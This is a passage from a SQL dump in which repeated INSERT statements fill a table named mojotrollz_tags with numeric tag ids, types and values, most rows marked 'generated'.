VALUES (5839, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5839, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5840, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5841, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5841, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5842, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5842, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5842, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5842, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5842, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5844, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5847, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5847, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5848, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5848, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5849, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5849, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5850, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5850, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5851, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5851, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5852, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5852, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5853, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5853, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5854, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5854, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5855, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5855, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5857, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5858, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5859, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5859, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5860, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5860, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5861, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5862, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5862, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5863, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5863, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5864, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5865, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5865, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5870, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5870, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5871, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5871, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5871, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5871, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5871, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5872, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5873, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5874, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5875, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5878, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5878, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5878, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5878, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5880, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5881, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5884, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5884, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5886, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5887, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5887, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5888, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5889, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5890, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5890, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5891, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5891, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5893, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5894, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5895, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5897, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5899, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5899, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5901, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5905, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5905, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5906, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5906, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5907, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5907, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5907, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5907, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5908, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5910, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5911, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5912, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5912, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5912, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5915, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5915, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5916, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5916, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5917, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5918, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5928, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5928, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5929, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5930, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5930, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5931, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5931, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5932, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5932, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5933, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5933, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5934, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5934, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5935, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5935, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5937, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5937, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5938, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5938, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5939, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5940, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5941, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5941, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5942, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5942, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5944, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5947, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5949, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5951, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5952, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5952, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5953, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5953, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5955, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5957, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 